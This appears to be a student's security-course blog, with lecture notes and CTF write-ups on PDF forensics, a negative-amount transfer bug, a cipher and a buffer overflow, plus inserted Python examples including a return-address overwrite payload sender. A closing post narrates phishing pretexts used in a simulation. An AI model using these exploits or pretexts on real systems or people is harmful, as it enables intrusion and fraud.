secuseraj
My Sec Blog
100 posts
Frequent* Blogs on Security
secuseraj · 6 years ago
Chernobyl
Task from Richard: research one of the three nuclear accidents.
Chernobyl was an accident caused by all three of the main root causes that were talked about in the lecture.
The human error can be seen in a number of cases. The nuclear overseer was arrogant; nothing had gone wrong in his 25 years of operation, so he assumed he knew exactly how things worked and severely strained the reactor. He also denied that the reactor had exploded, as he thought an explosion was impossible, which sent misinformation up the chain of command.
The culture cause can be seen in the government in power knowing about issues with the reactor but keeping them a state secret. Employees also hastily rushed their tests, striving for achievements instead of caring whether the test was actually run properly. The same culture delayed the evacuation, as the state did not want to admit that something had gone wrong, possibly costing thousands of lives.
The system error occurred when the operators correctly pressed the AZ-5 button, the total shutdown of the plant, and it was this action that caused the explosion because of a major flaw in the reactor's design. Imagine hitting the brakes hard in your car and, instead of stopping, surging ahead. This is an obvious case of misplaced trust in the system.
secuseraj · 6 years ago
Google Yourself
This task was to download your data and analyse what you find. I downloaded my Facebook data and was quite surprised that all conversations were stored. I mean, I should have expected this part, as I am able to search messages I sent a long time ago. Conversations from groups that you have left are still stored, although I believe that if you deleted the conversation history it wouldn't be stored (guessing it's still stored for the others in the chat though). What is also surprising, but shouldn't be, is that Facebook has its own phonebook, and I feel like you can get anyone's number as long as you are friends with them, which allows starting a voice chat via FB Messenger.
Other information stored is search history, games played, public polls voted on, posts, comments and any saved items. Other interesting information is security and login information. FB stores all the IP addresses that you have used in the past and also the devices you log in with. With this I predict that they are able to determine if an unwanted login is made, especially if it's from an unknown IP address. All session information is also stored. There is a bunch of cookie information with dates and times under them; I'm not entirely sure what they are used for.
Lastly, the most interesting part: FB ads information. Based on your Facebook activity and other actions, interests are created. (Other actions, I am assuming, being searches on other sites, as there have been multiple times I looked to buy something and the next day it was an ad on Facebook.) On top of this there are advertisers who run ads using contact lists they uploaded, meaning you are getting ads from these companies, and lastly FB stores which ads you have interacted with (which ads are being clicked), and I believe that they would use this information to show you similar ads (be wary of what ads you click on!!). Remember, they store all information from the day you create your account!
secuseraj · 6 years ago
login Leak
The goal is to reconstruct a password from 1000 three-letter parts. The password has no recurring characters and each part preserves the order of the characters in the password.
Here we can see a bunch of 6s, so it's safe to assume that even though the characters are in the right order they might not be directly next to each other.
My solution would be to line up all the similar characters vertically to determine their actual position. From the previous screenshot we can determine that we can combine the second and the last line together, and we know there is a 2 n between the _ and the 6. We can continuously do this to find the answer, although I'm not up to the task of actually doing this right now as it seems very time consuming. Maybe when I get more free time I will attempt this.
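The manual "line the characters up" approach generalises to an algorithm. Added example, not part of the original post: each fragment "abc" is an ordering constraint (a before b before c), and because no character repeats, the password is the unique topological order of those constraints. The password and the fragment list below are constructed for the demonstration; the real 1000-fragment dump is not on the page.

```python
from collections import defaultdict, deque

# Constructed sample: a 10-character password with no repeated characters,
# leaked as three-character fragments.  Each fragment keeps the password's
# character order but, as in the challenge, the characters need not be
# adjacent ("su6" is positions 1, 4 and 10 of "s3cur!ty_6").
LEAKED_FRAGMENTS = [
    "y_6", "s3c", "3r!", "cur", "ty_", "c!y",
    "ur!", "su6", "!ty", "r!t", "3cu", "s_6",
]


def reconstruct(fragments):
    """Rebuild the password from order-preserving fragments.

    A fragment "abc" says a comes before b and b before c.  Because no
    character repeats, the fragments define a directed acyclic graph over
    the characters and the password is a topological ordering of it; this is
    Kahn's algorithm.  Returns (password, unambiguous).  unambiguous is False
    when at some step more than one character could come next, i.e. the leak
    does not pin down a single password.  Contradictory fragments (a cycle)
    raise ValueError.
    """
    successors = defaultdict(set)
    indegree = {}
    for frag in fragments:
        for ch in frag:
            indegree.setdefault(ch, 0)
        for a, b in zip(frag, frag[1:]):
            if b not in successors[a]:
                successors[a].add(b)
                indegree[b] += 1

    ready = deque(sorted(ch for ch, deg in indegree.items() if deg == 0))
    out = []
    unambiguous = True
    while ready:
        if len(ready) > 1:
            unambiguous = False
        ch = ready.popleft()
        out.append(ch)
        for nxt in sorted(successors[ch]):
            indegree[nxt] -= 1
            if indegree[nxt] == 0:
                ready.append(nxt)

    if len(out) != len(indegree):
        raise ValueError("fragments contradict each other (cycle in ordering)")
    return "".join(out), unambiguous


if __name__ == "__main__":
    print(reconstruct(LEAKED_FRAGMENTS))
```

The `unambiguous` flag is the check worth keeping: with 1000 fragments the order is almost certainly fully determined, but if two characters never appear together in any fragment the leak only gives a set of candidate passwords, not one.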
secuseraj · 6 years ago
Spot the fake
Recently I was surfing YouTube and came across a video of a food scientist reviewing videos from a popular food channel. Not going to name any channels. The YouTube channel being reviewed was massive and had a lot of views; however, in the review video, many of the recipes used were shown to be fake and didn't work very well.
Nevertheless the video was a big hit. I think they achieved this through superior video editing skills and recipes that seem like they might work but in actuality don't. It can be detected by following their recipe and finding out it doesn't work, or by doing some research. Prevention is quite hard, as the YouTube algorithm favours videos with likes, and since the vast majority of people have liked these sorts of videos they will always be popular.
Something that can easily be faked is social media, images and people's perception of you. This can easily be faked by creating a fake story and backing it up with an image. Maybe you don't go to the gym but want people to think you do: go to the gym, take a photo of yourself and post it. There are many photos on Instagram that use Photoshop to make people look better.
secuseraj · 6 years ago
Stargate Ghost problem
The Stargate ghost problem is this: you discover a portal to a new alien world and you, as a major in the army, send a cadet through the portal. An alien returns claiming that the cadet is with him but has turned invisible. The goal is to get a report from the cadet through the alien, including information such as whether the alien is to be trusted and whether anything needs to be done urgently based on that information (such as preparing defences because the aliens are planning to attack). The problem is that the alien has become the middle man.
During the group discussion we started off pretty rough. We didn't know how to avoid the middle man attack. We first thought of the Diffie-Hellman key exchange to generate keys; however, this is susceptible to a man-in-the-middle attack. We then thought we could use an HMAC for the cadet to send his report, but this scenario would only work if the cadet had very good computing power, and this was unlikely. Then I got the idea to use a one-time pad (OTP) and separate the ghost cadet from the alien. The cadet would see the OTP and use it to encrypt his report, and then the major would be able to decrypt the message to get the report. This should work under the circumstances, as the alien has no knowledge of the OTP. If the alien is hostile and tries to change the message, the ciphertext would be altered; however, it would be unlikely that the resulting plaintext would make any sense.
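Added example, not from the post or the group discussion: the pad scheme in Python, together with the one move a hostile middle man still has. A one-time pad hides the report, but XOR is malleable: if the alien can guess a word of the plaintext (a fixed word in a report template, say), flipping exactly those ciphertext bits makes the major decrypt a perfectly readable, wrong report. The block therefore also shows what an authenticator over the ciphertext buys, keyed with a second secret the alien never sees (the discussion rejected HMAC on compute grounds; this is just what it would detect). Report text, pad and MAC key are constructed.

```python
import hashlib
import hmac
import os


def otp_encrypt(pad: bytes, message: bytes) -> bytes:
    """One-time pad: XOR every message byte with a pad byte that is used once."""
    if len(pad) < len(message):
        raise ValueError("pad must be at least as long as the message")
    return bytes(m ^ p for m, p in zip(message, pad))


otp_decrypt = otp_encrypt  # XOR is its own inverse


def alien_tamper(ciphertext: bytes, known: bytes, wanted: bytes, offset: int) -> bytes:
    """What a hostile middle man can do without knowing the pad.

    If the alien can guess the plaintext at some position, XORing the
    ciphertext there with known ^ wanted makes it decrypt to `wanted`
    instead.  The pad gives secrecy, not integrity.
    """
    if len(known) != len(wanted):
        raise ValueError("only equal-length substitutions are this easy")
    c = bytearray(ciphertext)
    for i, (k, w) in enumerate(zip(known, wanted)):
        c[offset + i] ^= k ^ w
    return bytes(c)


def tag(mac_key: bytes, ciphertext: bytes) -> bytes:
    """Authenticator over the ciphertext; the key must also be hidden from the alien."""
    return hmac.new(mac_key, ciphertext, hashlib.sha256).digest()


def verify(mac_key: bytes, ciphertext: bytes, t: bytes) -> bool:
    return hmac.compare_digest(tag(mac_key, ciphertext), t)


def demo(pad=None):
    """Returns (honest_report, forged_report, forgery_detected)."""
    report = b"ALIEN: HOSTILE"          # constructed report text
    if pad is None:
        pad = os.urandom(len(report))   # fresh random pad, never reused
    mac_key = b"constructed-mac-key"    # second secret shared by cadet and major
    ct = otp_encrypt(pad, report)
    t = tag(mac_key, ct)
    # The alien guesses the word at offset 7 and swaps it for one of the same length.
    tampered = alien_tamper(ct, b"HOSTILE", b"ALLIES!", offset=7)
    honest = otp_decrypt(pad, ct)
    forged = otp_decrypt(pad, tampered)
    return honest, forged, not verify(mac_key, tampered, t)


if __name__ == "__main__":
    print(demo())
```

Random byte-flipping does produce garbage, as the post says; the point of `alien_tamper` is that a middle man who knows the report's shape does not need to flip randomly.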
secuseraj · 6 years ago
Lecture 8
This week's lecture divided me. The first lecture was quite good, but I caught myself nodding off in the second lecture.
The first lecture was about root cause analysis and what is generally the cause of problems:
Human error
Culture
System
Richard also went through how easy it is to misdirect people. If you want someone to look at you, just start talking. If you want people to look at your hand, start waving. He compared magicians to social engineers and how timing is the important factor: making you look in one place at a certain time.
Richard gave a light-in-the-dark example which emphasised how people can only concentrate on one little thing at a time, and during a crisis it is hard to look at the big picture.
Frequency gambling: people use the patterns that they have used most in the past.
We automatically use patterns that we are comfortable with and that have been known to work in the past, which is great in general but can sometimes mislead us.
The difference between an accident and an attack is intent. In an accident there is no malicious intent, but there is in an attack.
The second lecture was story time with Richard. He read out important parts of a book on the Three Mile Island accident. It went through the root causes due to all of the above: human error, culture and, most importantly, system. The main point was that every system is going to have problems and our goal is to:
-design the system so that when things go wrong the impact is limited
-identify what it is we are trying to protect
secuseraj · 6 years ago
SA - dragon process
So I attempted to do the rookie task "dragon". I opened the binary in IDA, a disassembler, and figured out that there was a secret level in the character selection page if your input was 3.
Then the secret level got %10s from input and compared it with the "Nice_try..." line, I think, and we want the result to be 0, as the next line, "test eax, eax", will then set the zero flag to 1 and it will not jump and will give us a shell.
However, the problem is that we can only input 10 bytes and the line it is compared against is much longer. It would be good if there were a way to jump straight to the shell call. I have spent quite a bit of time and I still haven't figured it out.
secuseraj · 6 years ago
Secsoc CTF - Reference letter 2
This was also done after the CTF ended, so I didn't get any points for finishing this challenge.
This time the file actually worked; however, the flag wasn't there at all. The meme suggested looking at the PDF spec, whilst the hint says:
After googling rtfd I found it was a file format. Maybe I needed to convert it to that file format?? After trying to see what I could do with the PDF, I tried pdftotext, which seemed like the closest thing to rtfd.
So there was some error with a ref. After looking at the PDF in a text editor and looking up how a PDF should look, I found that there is a little extra bit added on after the PDF ends. %%EOF is usually the end of a PDF.
I also realised that reference 12 isn't even used in the PDF. (The third column of each xref entry, n or f, tells you whether that object is in use: n for in use and f for free.)
So I decided to just remove the part after the "%%EOF" and it worked.
And there we go. I suspect that ref 12 covered over the image. The last curly bracket is also missing, but if I just add it in, it works as the flag.
secuseraj · 6 years ago
Secsoc CTF - Reference letter
I completed this challenge after the CTF ended and thus it didn't go towards the score I showed earlier.
This CTF challenge was under the forensics section and only gave a link to Google Drive, which said the file couldn't be opened. When I first looked at the file I used strings, and there was a line talking about PDF magic numbers. This was referring to the first line, where %pdf was supposed to be %PDF. I changed it and could view the file.
However, when I tried to download the original file again to test it, I found that I could already view the PDF without any trouble, so I don't know exactly what's going on, but it does explain the high number of solves. Definitely easy and not really worth 100 points imo.
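Both reference letter challenges come down to two checks on the PDF container: the magic header, and what sits after the last %%EOF versus what the xref table actually lists. Added example, covering both posts above; it is not the challenge file or the author's fix. It builds a constructed one-page PDF with a correct xref table, breaks it the way the two challenges did (lowercase %pdf, and an object glued on after %%EOF that no xref entry references), then detects and repairs both. Object numbers, offsets and the appended junk are constructed; the real files are not on the page.

```python
import re

EOF_MARKER = b"%%EOF"


def build_sample_pdf() -> bytes:
    """Constructed minimal PDF: three objects, an xref table with correct offsets."""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>",
    ]
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref_at = len(out)
    out += b"xref\n0 %d\n" % (len(objs) + 1)
    out += b"0000000000 65535 f \n"           # object 0 is always free ('f')
    for off in offsets:
        out += b"%010d 00000 n \n" % off        # in-use entries ('n')
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\n" % (len(objs) + 1)
    out += b"startxref\n%d\n%%%%EOF\n" % xref_at
    return bytes(out)


def make_challenge() -> bytes:
    """Constructed approximation of the two challenges: bad magic plus an
    unreferenced object 12 appended after %%EOF."""
    pdf = build_sample_pdf()
    broken = b"%pdf" + pdf[4:]
    return broken + b"12 0 obj\n<< /Length 5 >>\nstream\nJUNK!\nendstream\nendobj\n"


def fix_magic(data: bytes) -> bytes:
    """Reference letter 1: the header must be exactly '%PDF'."""
    if data[:4].upper() == b"%PDF" and data[:4] != b"%PDF":
        return b"%PDF" + data[4:]
    return data


def trailing_bytes(data: bytes) -> bytes:
    """Bytes after the LAST %%EOF and its line ending.  Incrementally updated
    PDFs legitimately contain several %%EOF markers with data between them,
    so only what follows the last one is suspicious."""
    i = data.rfind(EOF_MARKER)
    if i < 0:
        raise ValueError("no %%EOF marker")
    end = i + len(EOF_MARKER)
    while end < len(data) and data[end:end + 1] in (b"\r", b"\n"):
        end += 1
    return data[end:]


def strip_trailing(data: bytes) -> bytes:
    """Reference letter 2: drop whatever was glued on after the real end."""
    extra = trailing_bytes(data)
    return data[:len(data) - len(extra)] if extra else data


def parse_xref(data: bytes) -> dict:
    """Follow the last startxref to the xref table.  Returns
    {objnum: (offset, generation, in_use)}; 'n' entries are in use, 'f' free."""
    matches = list(re.finditer(rb"startxref\s+(\d+)\s*%%EOF", data))
    if not matches:
        raise ValueError("no startxref")
    pos = int(matches[-1].group(1))
    if data[pos:pos + 4] != b"xref":
        raise ValueError("startxref does not point at an xref table")
    lines = data[pos:].split(b"\n")
    table, i = {}, 1
    while i < len(lines) and lines[i].strip() != b"trailer":
        start, count = (int(x) for x in lines[i].split())   # subsection header
        for n in range(count):
            off, gen, kind = lines[i + 1 + n].split()
            table[start + n] = (int(off), int(gen), kind == b"n")
        i += 1 + count
    return table


def objects_not_in_xref(data: bytes) -> set:
    """Object numbers declared in the file body but absent from the xref table:
    exactly the 'reference 12' situation in the post."""
    declared = {int(m.group(1)) for m in re.finditer(rb"(\d+)\s+\d+\s+obj\b", data)}
    return declared - set(parse_xref(data))


def repair(data: bytes) -> bytes:
    return strip_trailing(fix_magic(data))


if __name__ == "__main__":
    c = make_challenge()
    print("stray objects:", objects_not_in_xref(c))
    print("repaired == original:", repair(c) == build_sample_pdf())
```

`objects_not_in_xref` is the quicker diagnostic of the two: an object number present in the body but missing from the table (or marked `f`) is either an incremental update whose own xref you have not parsed, or exactly the stray junk these challenges appended.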
secuseraj · 6 years ago
Secsoc CTF - k17coin
This challenge was part of Web and gave you 5 accounts with $100 each in them. It allowed transfers between the accounts and buying certain items.
Shop List:
Functions:
With these functions I had to test some edge cases, and ultimately I tested using negative amounts in transfers to see if it was similar to the blackjack game from pwnable.kr, and it was!!
The flag was easily bought because I am rich now!!!!
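Added example, not the k17coin app's code: a Python stand-in for the transfer logic with the bug beside its fix. The vulnerable version only checks `balance >= amount`, which any negative amount passes, so "transferring" -1000 away from your own account credits it with 1000. The hardened version parses the form value as digits only and rejects anything that is not a strictly positive integer. Account names and the flag price are constructed; the real shop prices are not on the page.

```python
class Bank:
    """Constructed stand-in for the k17coin app: five accounts, $100 each.

    hardened=False reproduces the bug: only `balance >= amount` is checked,
    which a negative amount passes trivially.
    """

    FLAG_PRICE = 1000  # assumed shop price; the real price isn't on the page

    def __init__(self, hardened=True):
        self.balance = {f"acc{i}": 100 for i in range(1, 6)}
        self.hardened = hardened

    def transfer(self, src, dst, amount):
        if self.hardened:
            # Strictly positive whole-dollar amounts only.  bool is an int
            # subclass, so exclude it explicitly; reject self-transfers too.
            if isinstance(amount, bool) or not isinstance(amount, int) or amount <= 0:
                raise ValueError("amount must be a positive integer")
            if src == dst:
                raise ValueError("cannot transfer to the same account")
        # The original check: fine for positive amounts, useless for negatives.
        if self.balance[src] < amount:
            raise ValueError("insufficient funds")
        self.balance[src] -= amount
        self.balance[dst] += amount

    def buy(self, who, price):
        if self.balance[who] < price:
            raise ValueError("insufficient funds")
        self.balance[who] -= price
        return True


def is_valid_amount(raw: str) -> bool:
    """Web input arrives as a string; accept only ASCII digits with a non-zero value,
    so '-1000', '1e9', ' 5', '+5' and '' are all rejected before int() sees them."""
    return raw.isascii() and raw.isdigit() and int(raw) > 0


def parse_amount(raw: str) -> int:
    if not is_valid_amount(raw):
        raise ValueError("invalid amount")
    return int(raw)


def exploit(bank: Bank) -> bool:
    """Send -1000 from acc1 to acc2: acc1 gains 1000, acc2 goes to -900.
    Then buy the flag from acc1.  Returns whether the purchase went through."""
    try:
        bank.transfer("acc1", "acc2", -1000)
        return bank.buy("acc1", Bank.FLAG_PRICE)
    except ValueError:
        return False


if __name__ == "__main__":
    print("vulnerable:", exploit(Bank(hardened=False)))   # True
    print("hardened:  ", exploit(Bank(hardened=True)))    # False
```

The same shape of bug applies to the shop: a price or quantity taken from the client rather than looked up server-side lets a negative quantity credit the buyer, so validate every money-bearing field the same way.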
secuseraj · 6 years ago
Secsoc CTF - rotation
After downloading the cupcake file and opening it, it just contained a bunch of letters. However, since learning about ciphers I quickly realised it was some sort of cipher, and cheated a little by using an online cipher breaker.
Hey, who has the time to do this manually?
After using the online substitution cipher decoder we realised it was indeed a monoalphabetic substitution cipher and found:
}llor eistoot ekaceseehc tressed sraeb immug evol I{GALF
which we reversed and found:
FLAG{I love gummi bears dessert cheesecake tootsie roll}
Easy enough!!
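Added example, not the challenge's cipher or the online tool's code: a Python keyword-mixed monoalphabetic substitution applied to the reversed flag, plus the crib trick that gets you a foothold without a tool. Once you notice the decrypted text is backwards, the last five characters must decrypt to `{GALF`, which pins down four letters of the key for free. The keyword `CUPCAKES` is constructed; the real key is not on the page.

```python
import string

# The cupcake file was a monoalphabetic substitution of the flag written
# backwards.  The keyword is constructed; the challenge's real key is unknown.
KEYWORD = "CUPCAKES"
FLAG = "FLAG{I love gummi bears dessert cheesecake tootsie roll}"


def cipher_alphabet(keyword: str) -> str:
    """Keyword-mixed alphabet: keyword letters (deduplicated) then the rest of A-Z."""
    seen = []
    for ch in keyword.upper() + string.ascii_uppercase:
        if ch.isalpha() and ch not in seen:
            seen.append(ch)
    return "".join(seen)


def build_maps(keyword: str):
    """Encryption and decryption tables for the keyword."""
    ca = cipher_alphabet(keyword)
    enc = dict(zip(string.ascii_uppercase, ca))
    dec = dict(zip(ca, string.ascii_uppercase))
    return enc, dec


def substitute(text: str, mapping: dict) -> str:
    """Apply a letter mapping, preserving case; non-letters pass through unchanged."""
    out = []
    for ch in text:
        if ch.isalpha():
            m = mapping[ch.upper()]
            out.append(m if ch.isupper() else m.lower())
        else:
            out.append(ch)
    return "".join(out)


def make_challenge() -> str:
    """Reverse the flag, then substitute: what the cupcake file would contain."""
    enc, _ = build_maps(KEYWORD)
    return substitute(FLAG[::-1], enc)


def crib_mapping(ciphertext: str, crib: str, at: int) -> dict:
    """Partial key from known plaintext at a known offset: cipher letter -> plain letter.

    The flag format FLAG{...} is known, and the text is reversed, so the last
    five characters must decrypt to '{GALF'.  Conflicting cribs raise.
    """
    mapping = {}
    for c, p in zip(ciphertext[at:at + len(crib)], crib):
        if c.isalpha() and p.isalpha():
            if mapping.get(c.upper(), p.upper()) != p.upper():
                raise ValueError("crib conflicts with itself")
            mapping[c.upper()] = p.upper()
    return mapping


def solve(ciphertext: str, dec: dict) -> str:
    """Decrypt with a full key (the online tool's job) and undo the reversal."""
    return substitute(ciphertext, dec)[::-1]


if __name__ == "__main__":
    ct = make_challenge()
    print(ct)
    print(crib_mapping(ct, "{GALF", len(ct) - 5))
    print(solve(ct, build_maps(KEYWORD)[1]))
```

Four letters is not the whole key, but `F`, `L`, `A` and `G` are also common English letters, so feeding the partial mapping into frequency analysis (or the online breaker as a constraint) resolves the rest quickly.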
secuseraj · 6 years ago
Secsoc CTF - bufff
This challenge, which was directed at us, was the buffer overflow challenge, so it was the first one that I started working on. I first downloaded the binary and chmod'ed it to get permission to run it. After running it I was presented with the following screen:
which led me to think that there was some sort of gets command fetching user input. So my goal was to determine how large this buffer was and try to place my own address in the return address. I then ran objdump to see the assembly code. I found a few interesting functions other than main, which were indestructible and ohSh1t. indestructible was called in main, but ohSh1t was never called, so I figured that that was the address we wanted in the return address.
I figured the red part was the output from the previous picture and the yellow underlined part was the buffer. Similar to how I solved the buffer overflow challenges given by caff, I knew what to do.
I thought that I had got it initially and that this was the flag, but I soon realised that there was a server to connect to, and found the flag soon after reusing code I used for pwnable bof.
Done!!
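Added example, not the author's exploit script: the payload construction for a return-address overwrite, in plain Python so it runs without pwntools. The buffer size, the distance to the saved return address and the address of `ohSh1t` are hypothetical; they come from objdump/gdb on the real binary and are not on the page. The check worth keeping is `bad_offsets`: `gets()` stops at a newline, so an address containing `0x0a` cannot be delivered through it and you need a different target or gadget.

```python
import struct

# Hypothetical layout for illustration only; the real offset and the address
# of ohSh1t come from objdump/gdb on the actual binary and are not on the page.
BUFFER_LEN = 64       # size of the gets() buffer
SAVED_SLOTS = 12      # bytes between the end of the buffer and the saved return address
OHSH1T_ADDR = 0x080484b6

# gets() stops reading at a newline, so 0x0a must not appear in the payload.
# For strcpy-style sinks 0x00 would be fatal too; pass terminators=(0x0a, 0x00).
TERMINATORS = (0x0a,)


def build_payload(buffer_len: int, saved_slots: int, target: int, bits: int = 32) -> bytes:
    """Padding up to the saved return address, then `target` little-endian."""
    fmt = "<I" if bits == 32 else "<Q"
    return b"A" * (buffer_len + saved_slots) + struct.pack(fmt, target)


def bad_offsets(payload: bytes, terminators=TERMINATORS) -> list:
    """Offsets of bytes at which the input routine would cut the payload short."""
    return [i for i, b in enumerate(payload) if b in terminators]


def exploit_bytes() -> bytes:
    """The line to send: payload plus the newline that ends the gets() read."""
    payload = build_payload(BUFFER_LEN, SAVED_SLOTS, OHSH1T_ADDR)
    bad = bad_offsets(payload)
    if bad:
        raise ValueError(f"payload would be truncated at {bad}; choose another address")
    return payload + b"\n"


def send(host: str, port: int) -> bytes:
    """Deliver the payload to the CTF service and return what it prints back.
    Host and port are whatever the challenge gave; not on the page."""
    import socket
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(exploit_bytes())
        return s.recv(4096)


if __name__ == "__main__":
    print(exploit_bytes())
```

On a 64-bit target the address is eight bytes and its top bytes are zero; `gets()` does not mind null bytes, but the `0x0a` rule still applies, which is why `build_payload` takes `bits`.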
secuseraj · 6 years ago
Time management update
The job app is due this weekend, Sunday 5 pm. I don't want to rush everything at the last minute, so I have just started on creating my job app on OpenLearning. It took a bit because I missed the big 'Create Page' button and kept creating old-style pages, which made me quite confused. But I have sorted all that out now; I now need to finish up my blogs and add and link them in my job app!! I also have to do my video on my SA that's due tomorrow.
Started on the job app almost a week ahead of its due date!! :D
secuseraj · 6 years ago
alloca- progress
This problem goes through a buffer overflow example, simply stating how easy it is to avoid a buffer overflow. Here is a simple runthrough.
I got far enough to realise that inputting a negative value when sizing the buffer would give a buffer overflow, as there is then no buffer, but I didn't know the exact value I should be making the buffer.
Looking at the assembly instructions didn't help me much either, as I just got more confused about what was actually happening, but maybe if I rest on it and come back it'll click.
secuseraj · 6 years ago
asm -progress
I tried doing this challenge on shellcode and looked all over the internet for shellcode (it's full of it). Basically I hit a bunch of articles explaining how to craft your own shellcode and another bunch suggesting that there is so much shellcode out there that there is no need to make your own. Nonetheless I tried all sorts of shellcode and none of them worked. So I decided to make my own, kind of. I used pwntools, and from what I read the code below should have worked, but it didn't, so maybe I was using a system call beyond just the open, read and write calls. I still think I'm quite close to the solution.
secuseraj · 6 years ago
SecSoc CTF
Yesterday I went to the term 2 SecSoc CTF.
I worked with Dale on the CTF, and we knew that we weren't going for the prizes as we were both fairly new to this type of competition. We worked on the CTF for about 3 hrs, then I worked a few more hrs after the competition was over. We got a total of 3 challenges done during the CTF and I managed to do 2 more after the competition was over.
Our team name was noobies.
The majority of the fails were due to not realising the flag input format.
We managed to complete the buffer overflow challenge, which was for students of 6[48]41, which we are!!
I will blog about the challenges that we solved.
I liked doing the challenges; it was like a little puzzle game testing your knowledge.
secuseraj · 6 years ago
Social Engineering Sim - Email Phishing
So this task allowed us to do some phishing in order to get some details and organise a payment. I feel that in a small team a lot of things can be quickly verified, so they can find out the legitimacy of an email quickly; however, as we are up against bots (I think), I can send out as many emails as I want.
For the Facebook login I requested login details from Sarah and posed as David, the other employee.
This didn't work, so I made it clearer and justified why I needed the login details. Nice, I got the first part!!
The second goal is to organise a payment to a fake account. I asked about payments and she redirected me to David.
After sending an email to David I found that I needed the payment to be more urgent.
In this email I posed as Sarah and said the dogs' lives were on the line... couldn't believe it didn't work.
I felt so close last time, and this time I decided to pose as a donor who accidentally gave too much money and required a refund to pay my bills, and it worked.